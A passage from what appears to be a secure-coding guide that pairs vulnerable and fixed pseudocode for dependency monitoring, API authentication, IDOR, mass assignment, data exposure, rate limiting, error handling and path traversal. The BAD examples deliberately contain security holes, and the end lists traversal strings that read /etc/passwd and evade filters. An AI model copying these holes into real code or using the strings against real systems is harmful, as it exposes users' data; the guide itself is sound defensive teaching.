compromised +// node-ipc incident: Maintainer added malicious code + +// ======================================== +// GOOD: Full dependency tree visibility and control +// ======================================== + +// Step 1: Analyze full dependency tree +FUNCTION analyze_dependency_tree(): + tree = package_manager.get_dependency_tree() + + analysis = { + direct: [], + transitive: [], + depth_stats: {}, + risk_assessment: [] + } + + FOR dep IN tree.flatten(): + IF dep.depth == 1: + analysis.direct.append(dep) + ELSE: + analysis.transitive.append(dep) + END IF + + // Track dependency depth + analysis.depth_stats[dep.depth] = + (analysis.depth_stats[dep.depth] OR 0) + 1 + + // Risk factors for transitive deps + risk_score = calculate_risk(dep) + IF risk_score > THRESHOLD: + analysis.risk_assessment.append({ + package: dep.name, + introduced_by: dep.parent_chain, + risk_score: risk_score, + factors: get_risk_factors(dep) + }) + END IF + END FOR + + RETURN analysis +END FUNCTION + +FUNCTION calculate_risk(dep): + risk = 0 + + // Maintainer factors + IF dep.maintainers.count == 1: + risk += 10 // Single maintainer - bus factor + END IF + + IF dep.last_update > 2_YEARS_AGO: + risk += 20 // Abandoned package + END IF + + // Security factors + IF dep.vulnerability_count > 0: + risk += dep.vulnerability_count * 15 + END IF + + IF dep.has_install_scripts: + risk += 25 // Runs code on install + END IF + + // Popularity/trust factors + IF dep.weekly_downloads < 1000: + risk += 10 // Low usage + END IF + + IF NOT dep.has_types AND dep.is_js: + risk += 5 // Less maintained indicator + END IF + + RETURN risk +END FUNCTION + +// Step 2: Detect and alert on risky transitive deps +FUNCTION monitor_transitive_deps(): + tree = get_dependency_tree() + + FOR dep IN tree.flatten(): + // Check for suspicious characteristics + IF dep.has_install_scripts: + log.warn("Package has install scripts", { + package: dep.name, + path: dep.parent_chain + }) + // Review install scripts for malicious code + scripts = get_install_scripts(dep) + FOR script IN scripts: + IF contains_suspicious_patterns(script): + THROW SecurityError("Suspicious install script in: " + dep.name) + END IF + END FOR + END IF + + // Check for native code compilation + IF dep.has_native_code: + log.warn("Package compiles native code", { + package: dep.name + }) + END IF + + // Check for network access + IF dep.makes_network_requests: + log.warn("Package makes network requests", { + package: dep.name + }) + END IF + END FOR +END FUNCTION + +// Step 3: Use dependency scanning that covers transitives +FUNCTION full_dependency_scan(): + // Scan all dependencies, not just direct + scan_result = security_scanner.scan({ + include_transitive: TRUE, + include_dev_dependencies: TRUE, + scan_depth: "all" // Not just top-level + }) + + FOR vuln IN scan_result.vulnerabilities: + // Show the path that introduces the vulnerability + log.error("Vulnerability found", { + package: vuln.package, + version: vuln.version, + severity: vuln.severity, + introduced_through: vuln.dependency_path, // e.g., "express > body-parser > qs" + recommendation: vuln.recommendation + }) + END FOR + + RETURN scan_result +END FUNCTION + +// Step 4: Consider dependency vendoring for critical deps +FUNCTION vendor_critical_dependency(package_name): + // Download specific version + content = download_verified( + get_package_url(package_name), + get_expected_hash(package_name) + ) + + // Store in vendor directory (committed to repo) + write_file("vendor/" + package_name, content) + + // Point imports to vendored version + configure_import_alias(package_name, "./vendor/" + package_name) + + // Vendored code is: + // - Not automatically updated (reduces surprise changes) + // - Under your source control (auditable) + // - Not subject to registry compromise +END FUNCTION + +// Step 5: Use SBOM (Software Bill of Materials) +FUNCTION generate_sbom(): + sbom = { + format: "CycloneDX", // or SPDX + components: [], + dependencies: [] + } + + FOR dep IN get_all_dependencies(): + sbom.components.append({ + type: "library", + name: dep.name, + version: dep.version, + purl: "pkg:npm/" + dep.name + "@" + dep.version, + hashes: [ + {algorithm: "SHA-256", content: dep.sha256} + ], + licenses: dep.licenses, + supplier: dep.publisher + }) + END FOR + + // Export for vulnerability tracking + write_file("sbom.json", json.encode(sbom)) + + // Submit to vulnerability database for ongoing monitoring + vuln_service.monitor_sbom(sbom) +END FUNCTION +``` + +--- + +## 9. API Security + +**CWE References:** CWE-284 (Improper Access Control), CWE-639 (IDOR), CWE-915 (Mass Assignment), CWE-200 (Exposure of Sensitive Information), CWE-770 (Resource Allocation Without Limits), CWE-209 (Error Message Information Exposure) +**Severity:** Critical to High | **Related:** [[API-Security]] + +> **Risk:** APIs are the primary attack surface for modern applications. Missing authentication, broken authorization (IDOR), and mass assignment vulnerabilities allow attackers to access or modify data belonging to other users, escalate privileges, and exfiltrate sensitive information. AI frequently generates API endpoints without proper security controls. + +### 9.1 Missing Authentication on Endpoints + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Unprotected API endpoints +// ======================================== + +// No authentication - anyone can access +@route("/api/users") +FUNCTION get_all_users(): + RETURN database.query("SELECT * FROM users") +END FUNCTION + +// Admin functionality without auth check +@route("/api/admin/delete-user/{id}") +FUNCTION admin_delete_user(id): + database.execute("DELETE FROM users WHERE id = ?", [id]) + RETURN {status: "deleted"} +END FUNCTION + +// Sensitive data exposed without auth +@route("/api/orders/{order_id}") +FUNCTION get_order(order_id): + RETURN database.get_order(order_id) +END FUNCTION + +// "Security through obscurity" - hidden endpoint still accessible +@route("/api/internal/debug-info") +FUNCTION get_debug_info(): + RETURN { + database_connection: DB_STRING, + api_keys: LOADED_KEYS, + server_config: CONFIG + } +END FUNCTION + +// ======================================== +// GOOD: Authentication on all protected endpoints +// ======================================== + +// Middleware to enforce authentication +FUNCTION require_auth(handler): + RETURN FUNCTION wrapped(request): + token = request.headers.get("Authorization") + + IF token IS NULL: + RETURN response(401, {error: "Authentication required"}) + END IF + + user = verify_token(token) + IF user IS NULL: + RETURN response(401, {error: "Invalid or expired token"}) + END IF + + request.user = user + RETURN handler(request) + END FUNCTION +END FUNCTION + +// Middleware for admin-only routes +FUNCTION require_admin(handler): + RETURN require_auth(FUNCTION wrapped(request): + IF request.user.role != "admin": + log.security("Unauthorized admin access attempt", { + user_id: request.user.id, + endpoint: request.path + }) + RETURN response(403, {error: "Admin access required"}) + END IF + + RETURN handler(request) + END FUNCTION) +END FUNCTION + +// Protected endpoints with proper auth +@route("/api/users") +@require_admin // Only admins can list all users +FUNCTION get_all_users(request): + // Return only non-sensitive fields + users = database.query("SELECT id, name, email, created_at FROM users") + RETURN response(200, {users: users}) +END FUNCTION + +// Admin endpoint with proper protection +@route("/api/admin/delete-user/{id}") +@require_admin +FUNCTION admin_delete_user(request, id): + // Audit log before action + log.audit("User deletion", { + admin_id: request.user.id, + target_user_id: id + }) + + database.soft_delete("users", id) // Soft delete for audit trail + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Never expose internal/debug endpoints in production +IF environment != "production": + @route("/api/internal/debug-info") + @require_admin + FUNCTION get_debug_info(request): + RETURN {config: get_safe_config()} // Sanitized config only + END FUNCTION +END IF + +// Default deny - explicitly define allowed public endpoints +PUBLIC_ENDPOINTS = [ + "/api/auth/login", + "/api/auth/register", + "/api/public/status", + "/api/public/docs" +] + +FUNCTION global_auth_middleware(request): + IF request.path IN PUBLIC_ENDPOINTS: + RETURN next(request) + END IF + + // All other routes require authentication by default + RETURN require_auth(next)(request) +END FUNCTION +``` + +### 9.2 Broken Object-Level Authorization (IDOR) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: IDOR vulnerabilities - no ownership check +// ======================================== + +// Attacker changes user_id in URL to access others' data +@route("/api/users/{user_id}/profile") +@require_auth +FUNCTION get_user_profile(request, user_id): + // VULNERABLE: No check that user_id belongs to authenticated user + profile = database.get_profile(user_id) + RETURN response(200, profile) +END FUNCTION + +// Attacker can delete any order by changing order_id +@route("/api/orders/{order_id}") +@require_auth +FUNCTION delete_order(request, order_id): + // VULNERABLE: Deletes any order regardless of owner + database.delete("orders", order_id) + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Attacker accesses any document by guessing/incrementing ID +@route("/api/documents/{doc_id}") +@require_auth +FUNCTION get_document(request, doc_id): + // VULNERABLE: Sequential IDs make enumeration easy + doc = database.get_document(doc_id) + RETURN response(200, doc) +END FUNCTION + +// Horizontal privilege escalation via parameter tampering +@route("/api/transfer") +@require_auth +FUNCTION transfer_funds(request): + // VULNERABLE: from_account comes from user input + from_account = request.body.from_account + to_account = request.body.to_account + amount = request.body.amount + + execute_transfer(from_account, to_account, amount) + RETURN response(200, {status: "transferred"}) +END FUNCTION + +// ======================================== +// GOOD: Proper object-level authorization +// ======================================== + +// Always verify ownership before access +@route("/api/users/{user_id}/profile") +@require_auth +FUNCTION get_user_profile(request, user_id): + // SECURE: Verify user can only access their own profile + IF user_id != request.user.id AND request.user.role != "admin": + log.security("IDOR attempt blocked", { + authenticated_user: request.user.id, + attempted_access: user_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + profile = database.get_profile(user_id) + IF profile IS NULL: + RETURN response(404, {error: "Profile not found"}) + END IF + + RETURN response(200, profile) +END FUNCTION + +// Resource ownership verification +@route("/api/orders/{order_id}") +@require_auth +FUNCTION delete_order(request, order_id): + order = database.get_order(order_id) + + IF order IS NULL: + RETURN response(404, {error: "Order not found"}) + END IF + + // SECURE: Verify ownership before action + IF order.user_id != request.user.id: + log.security("Unauthorized order deletion attempt", { + user_id: request.user.id, + order_id: order_id, + owner_id: order.user_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + // Additional business logic check + IF order.status == "shipped": + RETURN response(400, {error: "Cannot delete shipped orders"}) + END IF + + database.delete("orders", order_id) + RETURN response(200, {status: "deleted"}) +END FUNCTION + +// Use UUIDs instead of sequential IDs to prevent enumeration +FUNCTION create_document(request): + doc_id = generate_uuid() // Not sequential, not guessable + + database.insert("documents", { + id: doc_id, + owner_id: request.user.id, + content: request.body.content + }) + + RETURN response(201, {id: doc_id}) +END FUNCTION + +// Implicit ownership from authenticated user +@route("/api/transfer") +@require_auth +FUNCTION transfer_funds(request): + // SECURE: from_account MUST belong to authenticated user + from_account = database.get_account(request.body.from_account) + + IF from_account IS NULL OR from_account.owner_id != request.user.id: + RETURN response(403, {error: "Invalid source account"}) + END IF + + to_account = database.get_account(request.body.to_account) + IF to_account IS NULL: + RETURN response(404, {error: "Destination account not found"}) + END IF + + amount = request.body.amount + IF amount <= 0 OR amount > from_account.balance: + RETURN response(400, {error: "Invalid amount"}) + END IF + + execute_transfer(from_account.id, to_account.id, amount) + + log.audit("Funds transfer", { + user_id: request.user.id, + from: from_account.id, + to: to_account.id, + amount: amount + }) + + RETURN response(200, {status: "transferred"}) +END FUNCTION + +// Reusable authorization decorator +FUNCTION authorize_resource(resource_type, id_param): + RETURN FUNCTION decorator(handler): + RETURN FUNCTION wrapped(request): + resource_id = request.params[id_param] + resource = database.get(resource_type, resource_id) + + IF resource IS NULL: + RETURN response(404, {error: resource_type + " not found"}) + END IF + + IF NOT can_access(request.user, resource): + log.security("Authorization failed", { + user_id: request.user.id, + resource_type: resource_type, + resource_id: resource_id + }) + RETURN response(403, {error: "Access denied"}) + END IF + + request.resource = resource + RETURN handler(request) + END FUNCTION + END FUNCTION +END FUNCTION + +// Usage +@route("/api/documents/{doc_id}") +@require_auth +@authorize_resource("documents", "doc_id") +FUNCTION get_document(request, doc_id): + RETURN response(200, request.resource) // Already verified +END FUNCTION +``` + +### 9.3 Mass Assignment Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Mass assignment - accepting all user input +// ======================================== + +// Attacker sends: {"name": "John", "role": "admin", "balance": 999999} +@route("/api/users/update") +@require_auth +FUNCTION update_user(request): + // VULNERABLE: Directly assigns all request body fields + user = database.get_user(request.user.id) + + FOR field, value IN request.body: + user[field] = value // Attacker can set ANY field! + END FOR + + database.save(user) + RETURN response(200, user) +END FUNCTION + +// ORM auto-mapping vulnerability +@route("/api/users") +@require_auth +FUNCTION create_user(request): + // VULNERABLE: ORM creates user from all request fields + user = User.create(request.body) // Includes role, isAdmin, etc.! + RETURN response(201, user) +END FUNCTION + +// Nested object mass assignment +@route("/api/orders") +@require_auth +FUNCTION create_order(request): + // VULNERABLE: Nested payment object can set price + order = Order.create({ + user_id: request.user.id, + items: request.body.items, + payment: request.body.payment // Attacker sets payment.amount = 0 + }) + RETURN response(201, order) +END FUNCTION + +// ======================================== +// GOOD: Explicit field allowlisting +// ======================================== + +// Define what fields can be updated +CONSTANT USER_UPDATABLE_FIELDS = ["name", "email", "phone", "address"] +CONSTANT USER_ADMIN_FIELDS = ["role", "status", "verified"] + +@route("/api/users/update") +@require_auth +FUNCTION update_user_secure(request): + user = database.get_user(request.user.id) + + // SECURE: Only update explicitly allowed fields + FOR field IN USER_UPDATABLE_FIELDS: + IF field IN request.body: + user[field] = sanitize(request.body[field]) + END IF + END FOR + + database.save(user) + + // Return only safe fields + RETURN response(200, user.to_public_dict()) +END FUNCTION + +// Admin with different field permissions +@route("/api/admin/users/{user_id}") +@require_admin +FUNCTION admin_update_user(request, user_id): + user = database.get_user(user_id) + + // Admins can update more fields, but still allowlisted + allowed_fields = USER_UPDATABLE_FIELDS + USER_ADMIN_FIELDS + + FOR field IN allowed_fields: + IF field IN request.body: + user[field] = request.body[field] + END IF + END FOR + + log.audit("Admin user update", { + admin_id: request.user.id, + user_id: user_id, + fields_changed: request.body.keys() + }) + + database.save(user) + RETURN response(200, user) +END FUNCTION + +// Use DTOs (Data Transfer Objects) for input +CLASS UserUpdateDTO: + name: String (max_length=100) + email: String (email_format, max_length=255) + phone: String (phone_format, optional) + address: String (max_length=500, optional) + + FUNCTION from_request(body): + dto = UserUpdateDTO() + dto.name = validate_string(body.name, max_length=100) + dto.email = validate_email(body.email) + dto.phone = validate_phone(body.phone) IF body.phone ELSE NULL + dto.address = validate_string(body.address, max_length=500) IF body.address ELSE NULL + RETURN dto + END FUNCTION +END CLASS + +@route("/api/users/update") +@require_auth +FUNCTION update_user_dto(request): + TRY: + dto = UserUpdateDTO.from_request(request.body) + CATCH ValidationError as e: + RETURN response(400, {error: e.message}) + END TRY + + user = database.get_user(request.user.id) + user.apply_dto(dto) // Only applies DTO fields + database.save(user) + + RETURN response(200, user.to_public_dict()) +END FUNCTION + +// Nested objects with strict validation +CLASS OrderCreateDTO: + items: Array of OrderItemDTO + shipping_address_id: UUID + // payment calculated server-side, NOT from request + + FUNCTION from_request(body, user): + dto = OrderCreateDTO() + dto.items = [OrderItemDTO.from_request(item) FOR item IN body.items] + + // Verify address belongs to user + address = database.get_address(body.shipping_address_id) + IF address IS NULL OR address.user_id != user.id: + THROW ValidationError("Invalid shipping address") + END IF + dto.shipping_address_id = address.id + + RETURN dto + END FUNCTION +END CLASS + +@route("/api/orders") +@require_auth +FUNCTION create_order_secure(request): + dto = OrderCreateDTO.from_request(request.body, request.user) + + // Calculate payment server-side from validated items + total = 0 + FOR item IN dto.items: + product = database.get_product(item.product_id) + total += product.price * item.quantity // Price from DB, not request! + END FOR + + order = Order.create({ + user_id: request.user.id, + items: dto.items, + shipping_address_id: dto.shipping_address_id, + total: total // Server-calculated + }) + + RETURN response(201, order.to_dict()) +END FUNCTION +``` + +### 9.4 Excessive Data Exposure + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Exposing too much data in API responses +// ======================================== + +// Returns entire user object including sensitive fields +@route("/api/users/{user_id}") +@require_auth +FUNCTION get_user(request, user_id): + user = database.get_user(user_id) + RETURN response(200, user) // Includes password_hash, SSN, internal_notes! +END FUNCTION + +// Returns all columns from database +@route("/api/orders") +@require_auth +FUNCTION get_orders(request): + orders = database.query("SELECT * FROM orders WHERE user_id = ?", + [request.user.id]) + RETURN response(200, orders) // Includes internal pricing, profit margins +END FUNCTION + +// Exposes related entities without filtering +@route("/api/products/{id}") +FUNCTION get_product(request, id): + product = database.get_product_with_relations(id) + RETURN response(200, product) // Includes supplier.contact, supplier.cost +END FUNCTION + +// Debug info in production responses +@route("/api/search") +FUNCTION search(request): + results = database.search(request.query.q) + RETURN response(200, { + results: results, + query_time_ms: results.execution_time, + sql_query: results.raw_query, // Exposes DB schema! + server_id: SERVER_ID + }) +END FUNCTION + +// ======================================== +// GOOD: Response filtering and DTOs +// ======================================== + +// Define response schemas +CLASS UserPublicResponse: + id: UUID + name: String + avatar_url: String + created_at: DateTime + + FUNCTION from_user(user): + RETURN { + id: user.id, + name: user.name, + avatar_url: user.avatar_url, + created_at: user.created_at + } + END FUNCTION +END CLASS + +CLASS UserPrivateResponse: // For the user themselves + id: UUID + name: String + email: String + phone: String (masked) + avatar_url: String + created_at: DateTime + preferences: Object + + FUNCTION from_user(user): + RETURN { + id: user.id, + name: user.name, + email: user.email, + phone: mask_phone(user.phone), // Show only last 4 digits + avatar_url: user.avatar_url, + created_at: user.created_at, + preferences: user.preferences + } + END FUNCTION +END CLASS + +@route("/api/users/{user_id}") +@require_auth +FUNCTION get_user_filtered(request, user_id): + user = database.get_user(user_id) + + IF user IS NULL: + RETURN response(404, {error: "User not found"}) + END IF + + // Different responses based on who's requesting + IF user_id == request.user.id: + RETURN response(200, UserPrivateResponse.from_user(user)) + ELSE: + RETURN response(200, UserPublicResponse.from_user(user)) + END IF +END FUNCTION + +// Explicit field selection in queries +@route("/api/orders") +@require_auth +FUNCTION get_orders_filtered(request): + // Only select fields needed for the response + orders = database.query( + "SELECT id, status, total, created_at, shipping_address " + + "FROM orders WHERE user_id = ?", + [request.user.id] + ) + + RETURN response(200, { + orders: orders.map(order => OrderResponse.from_order(order)) + }) +END FUNCTION + +// Filter nested relations +CLASS ProductResponse: + id: UUID + name: String + description: String + price: Decimal + category: String + images: Array + average_rating: Float + // Excludes: cost, supplier, profit_margin, internal_notes + + FUNCTION from_product(product): + RETURN { + id: product.id, + name: product.name, + description: product.description, + price: product.price, + category: product.category.name, // Only category name + images: product.images.map(i => i.url), // Only URLs + average_rating: product.average_rating + } + END FUNCTION +END CLASS + +// GraphQL field filtering +FUNCTION resolve_user(parent, args, context): + user = database.get_user(args.id) + + // Check each requested field + allowed_fields = get_allowed_fields(context.user, user) + + result = {} + FOR field IN context.requested_fields: + IF field IN allowed_fields: + result[field] = user[field] + ELSE: + result[field] = NULL // Or omit entirely + END IF + END FOR + + RETURN result +END FUNCTION + +// Never expose internal debugging info +@route("/api/search") +FUNCTION search_safe(request): + results = database.search(request.query.q) + + RETURN response(200, { + results: results.items.map(item => item.to_public_dict()), + total: results.total_count, + page: results.page + // No query_time_ms, sql_query, or server_id + }) +END FUNCTION + +// Pagination to prevent data dumping +@route("/api/users") +@require_admin +FUNCTION list_users(request): + page = INT(request.query.page, default=1) + per_page = MIN(INT(request.query.per_page, default=20), 100) // Max 100 + + users = database.paginate("users", page, per_page) + + RETURN response(200, { + users: users.map(u => UserAdminResponse.from_user(u)), + pagination: { + page: page, + per_page: per_page, + total_pages: users.total_pages, + total_count: users.total_count + } + }) +END FUNCTION +``` + +### 9.5 Missing Rate Limiting + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No rate limiting +// ======================================== + +// Login endpoint vulnerable to brute force +@route("/api/auth/login") +FUNCTION login(request): + user = database.find_by_email(request.body.email) + + IF user IS NULL OR NOT verify_password(request.body.password, user.password_hash): + RETURN response(401, {error: "Invalid credentials"}) + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Expensive operation with no limits +@route("/api/reports/generate") +@require_auth +FUNCTION generate_report(request): + // CPU-intensive, no limits - easy DoS + report = generate_complex_report(request.body.params) + RETURN response(200, report) +END FUNCTION + +// SMS/email sending without limits +@route("/api/auth/send-verification") +FUNCTION send_verification(request): + // Attacker can spam any phone/email + send_sms(request.body.phone, generate_code()) + RETURN response(200, {status: "sent"}) +END FUNCTION + +// ======================================== +// GOOD: Comprehensive rate limiting +// ======================================== + +// Rate limiter configuration +rate_limits = { + // Per IP limits + "ip:global": {limit: 1000, window: "1 hour"}, + "ip:auth": {limit: 10, window: "15 minutes"}, + "ip:sensitive": {limit: 5, window: "1 minute"}, + + // Per user limits + "user:global": {limit: 5000, window: "1 hour"}, + "user:write": {limit: 100, window: "1 hour"}, + + // Per resource limits + "resource:reports": {limit: 10, window: "1 hour"} +} + +FUNCTION rate_limit(key_type, key_suffix=""): + RETURN FUNCTION decorator(handler): + RETURN FUNCTION wrapped(request): + config = rate_limits[key_type] + + // Build rate limit key + IF key_type.starts_with("ip:"): + key = key_type + ":" + request.client_ip + key_suffix + ELSE IF key_type.starts_with("user:"): + IF request.user IS NULL: + RETURN response(401, {error: "Authentication required"}) + END IF + key = key_type + ":" + request.user.id + key_suffix + ELSE: + key = key_type + key_suffix + END IF + + // Check rate limit + current = redis.incr(key) + IF current == 1: + redis.expire(key, config.window) + END IF + + IF current > config.limit: + retry_after = redis.ttl(key) + log.security("Rate limit exceeded", { + key: key, + ip: request.client_ip, + user_id: request.user.id IF request.user ELSE NULL + }) + RETURN response(429, { + error: "Too many requests", + retry_after: retry_after + }, headers={"Retry-After": retry_after}) + END IF + + // Add rate limit headers + response = handler(request) + response.headers["X-RateLimit-Limit"] = config.limit + response.headers["X-RateLimit-Remaining"] = config.limit - current + response.headers["X-RateLimit-Reset"] = redis.ttl(key) + + RETURN response + END FUNCTION + END FUNCTION +END FUNCTION + +// Login with rate limiting +@route("/api/auth/login") +@rate_limit("ip:auth") +FUNCTION login_protected(request): + email = request.body.email + + // Additional per-account rate limiting + account_key = "auth:account:" + sha256(email) + attempts = redis.incr(account_key) + IF attempts == 1: + redis.expire(account_key, 3600) // 1 hour + END IF + + IF attempts > 5: + // Lock account temporarily + log.security("Account locked due to failed attempts", {email: email}) + RETURN response(423, { + error: "Account temporarily locked", + retry_after: redis.ttl(account_key) + }) + END IF + + user = database.find_by_email(email) + + IF user IS NULL OR NOT verify_password(request.body.password, user.password_hash): + // Don't reset counter on failure + RETURN response(401, {error: "Invalid credentials"}) + END IF + + // Reset counter on successful login + redis.delete(account_key) + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Expensive operations with strict limits +@route("/api/reports/generate") +@require_auth +@rate_limit("user:write") +@rate_limit("resource:reports") +FUNCTION generate_report_limited(request): + // Queue for async processing if over capacity + active_reports = get_active_report_count(request.user.id) + + IF active_reports > 3: + RETURN response(429, {error: "Too many reports in progress"}) + END IF + + job_id = queue_report_generation(request.user.id, request.body.params) + + RETURN response(202, { + job_id: job_id, + status: "queued", + estimated_time: estimate_completion_time() + }) +END FUNCTION + +// SMS/email with phone/email-specific limits +@route("/api/auth/send-verification") +@rate_limit("ip:sensitive") +FUNCTION send_verification_limited(request): + phone = request.body.phone + + // Rate limit per phone number + phone_key = "verify:phone:" + sha256(phone) + count = redis.incr(phone_key) + IF count == 1: + redis.expire(phone_key, 3600) // 1 hour + END IF + + IF count > 3: + RETURN response(429, { + error: "Too many verification requests for this number" + }) + END IF + + // Verify phone format before sending + IF NOT is_valid_phone(phone): + RETURN response(400, {error: "Invalid phone number"}) + END IF + + code = generate_secure_code() + redis.setex("verify:code:" + sha256(phone), 600, code) // 10 min expiry + + send_sms(phone, "Your code: " + code) + + RETURN response(200, {status: "sent"}) +END FUNCTION + +// Sliding window rate limiter for more precise control +FUNCTION sliding_window_limit(key, limit, window_seconds): + now = current_timestamp() + window_start = now - window_seconds + + // Remove old entries + redis.zremrangebyscore(key, "-inf", window_start) + + // Count current window + count = redis.zcard(key) + + IF count >= limit: + RETURN FALSE + END IF + + // Add current request + redis.zadd(key, now, generate_uuid()) + redis.expire(key, window_seconds) + + RETURN TRUE +END FUNCTION +``` + +### 9.6 Improper Error Handling in APIs + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Error messages revealing internal details +// ======================================== + +// Exposes database structure +@route("/api/users/{id}") +FUNCTION get_user_bad_errors(request, id): + TRY: + user = database.get_user(id) + RETURN response(200, user) + CATCH DatabaseError as e: + // VULNERABLE: Exposes table names, query structure + RETURN response(500, { + error: "Database error", + query: "SELECT * FROM users WHERE id = " + id, + message: e.message, // "Column 'password_hash' cannot be null" + stack_trace: e.stack_trace + }) + END TRY +END FUNCTION + +// Reveals filesystem paths +@route("/api/files/{file_id}") +FUNCTION get_file_bad(request, file_id): + TRY: + content = read_file("/var/app/uploads/" + file_id) + RETURN response(200, content) + CATCH FileNotFoundError as e: + // VULNERABLE: Exposes server filesystem structure + RETURN response(404, { + error: "File not found: /var/app/uploads/" + file_id, + available_files: list_directory("/var/app/uploads/") + }) + END TRY +END FUNCTION + +// Authentication timing oracle +@route("/api/auth/login") +FUNCTION login_timing_oracle(request): + user = database.find_by_email(request.body.email) + + IF user IS NULL: + // Returns immediately - attacker knows email doesn't exist + RETURN response(401, {error: "User not found"}) + END IF + + IF NOT verify_password(request.body.password, user.password_hash): + // Takes longer due to password verification + RETURN response(401, {error: "Invalid password"}) + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// Inconsistent error format breaks security tools +@route("/api/orders") +FUNCTION create_order_inconsistent(request): + IF NOT valid_items(request.body.items): + RETURN response(400, "Invalid items") // String + END IF + + IF NOT has_stock(request.body.items): + RETURN response(400, {msg: "Out of stock"}) // Different key + END IF + + IF payment_failed: + RETURN {status: "error", reason: "Payment failed"} // No status code + END IF +END FUNCTION + +// ======================================== +// GOOD: Secure, consistent error handling +// ======================================== + +// Standardized error response class +CLASS APIError: + status: Integer + code: String // Machine-readable error code + message: String // User-friendly message + request_id: String // For support/debugging + + FUNCTION to_response(): + RETURN response(this.status, { + error: { + code: this.code, + message: this.message, + request_id: this.request_id + } + }) + END FUNCTION +END CLASS + +// Error codes mapping (documented in API docs) +ERROR_CODES = { + "AUTH_REQUIRED": {status: 401, message: "Authentication required"}, + "AUTH_INVALID": {status: 401, message: "Invalid credentials"}, + "FORBIDDEN": {status: 403, message: "Access denied"}, + "NOT_FOUND": {status: 404, message: "Resource not found"}, + "VALIDATION_ERROR": {status: 400, message: "Invalid request data"}, + "RATE_LIMITED": {status: 429, message: "Too many requests"}, + "INTERNAL_ERROR": {status: 500, message: "An unexpected error occurred"} +} + +// Global error handler +FUNCTION global_error_handler(error, request): + request_id = generate_request_id() + + // Log full error details internally + log.error("Request failed", { + request_id: request_id, + path: request.path, + method: request.method, + user_id: request.user.id IF request.user ELSE NULL, + error_type: error.type, + error_message: error.message, + stack_trace: error.stack_trace, + request_body: redact_sensitive(request.body) + }) + + // Return sanitized error to client + IF error IS APIError: + error.request_id = request_id + RETURN error.to_response() + ELSE IF error IS ValidationError: + RETURN APIError( + status=400, + code="VALIDATION_ERROR", + message=error.user_message, // Safe message + request_id=request_id + ).to_response() + ELSE: + // Generic error - never expose internal details + RETURN APIError( + status=500, + code="INTERNAL_ERROR", + message="An unexpected error occurred. Reference: " + request_id, + request_id=request_id + ).to_response() + END IF +END FUNCTION + +// Secure authentication with constant-time comparison +@route("/api/auth/login") +FUNCTION login_secure_errors(request): + email = request.body.email + password = request.body.password + + user = database.find_by_email(email) + + // Always perform password check to prevent timing oracle + IF user IS NOT NULL: + password_valid = constant_time_compare( + hash_password(password, user.salt), + user.password_hash + ) + ELSE: + // Fake password check to maintain consistent timing + constant_time_compare( + hash_password(password, generate_fake_salt()), + DUMMY_HASH + ) + password_valid = FALSE + END IF + + IF NOT password_valid: + // Same error message whether user exists or not + log.security("Failed login attempt", { + email_hash: sha256(email), // Don't log raw email + ip: request.client_ip + }) + RETURN APIError( + status=401, + code="AUTH_INVALID", + message="Invalid email or password" + ).to_response() + END IF + + RETURN response(200, {token: create_token(user)}) +END FUNCTION + +// File operations without path disclosure +@route("/api/files/{file_id}") +FUNCTION get_file_secure(request, file_id): + // Validate file_id format (UUID only) + IF NOT is_valid_uuid(file_id): + RETURN APIError( + status=400, + code="VALIDATION_ERROR", + message="Invalid file ID format" + ).to_response() + END IF + + // Look up file in database (not filesystem path) + file_record = database.get_file(file_id) + + IF file_record IS NULL: + RETURN APIError( + status=404, + code="NOT_FOUND", + message="File not found" + ).to_response() + END IF + + // Check ownership + IF file_record.owner_id != request.user.id: + // Same error as not found - don't reveal existence + RETURN APIError( + status=404, + code="NOT_FOUND", + message="File not found" + ).to_response() + END IF + + TRY: + content = storage.read(file_record.storage_key) + RETURN response(200, content, headers={ + "Content-Type": file_record.mime_type + }) + CATCH StorageError as e: + log.error("File read failed", { + file_id: file_id, + storage_key: file_record.storage_key, + error: e.message + }) + RETURN APIError( + status=500, + code="INTERNAL_ERROR", + message="Unable to retrieve file" + ).to_response() + END TRY +END FUNCTION + +// Validation errors without revealing schema +FUNCTION validate_request(schema, data): + errors = [] + + FOR field, rules IN schema: + IF field NOT IN data AND rules.required: + errors.append({ + field: field, + message: "This field is required" + }) + ELSE IF field IN data: + value = data[field] + + // Type validation + IF NOT check_type(value, rules.type): + errors.append({ + field: field, + message: "Invalid value" // Don't say "expected integer" + }) + // Length validation + ELSE IF rules.max_length AND len(value) > rules.max_length: + errors.append({ + field: field, + message: "Value too long" + }) + END IF + END IF + END FOR + + IF errors.length > 0: + THROW ValidationError(errors) + END IF +END FUNCTION +``` + +--- + +## 10. File Handling + +**CWE References:** CWE-22 (Path Traversal), CWE-434 (Unrestricted Upload), CWE-377 (Insecure Temp File), CWE-59 (Symlink Following), CWE-732 (Incorrect Permission Assignment) +**Severity:** High to Critical | **Related:** [[File-Handling]] + +> **Risk:** File handling vulnerabilities enable attackers to read/write arbitrary files, execute malicious uploads, or escalate privileges through symlink attacks. AI-generated code frequently uses unsafe path concatenation and skips file validation entirely. + +### 10.1 Path Traversal Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Direct path concatenation allows traversal +// ======================================== +FUNCTION download_file_vulnerable(user_requested_filename): + // VULNERABLE: Attacker can request "../../etc/passwd" + file_path = "/var/app/uploads/" + user_requested_filename + + content = read_file(file_path) + RETURN content +END FUNCTION + +@route("/api/files/download") +FUNCTION handle_download_bad(request): + filename = request.query.filename + // No validation - attacker controls path + RETURN download_file_vulnerable(filename) +END FUNCTION + +// Attack examples: +// ?filename=../../etc/passwd -> reads /etc/passwd +// ?filename=....//....//etc/passwd -> bypasses simple ../ filters +// ?filename=..%2F..%2Fetc/passwd -> URL encoded 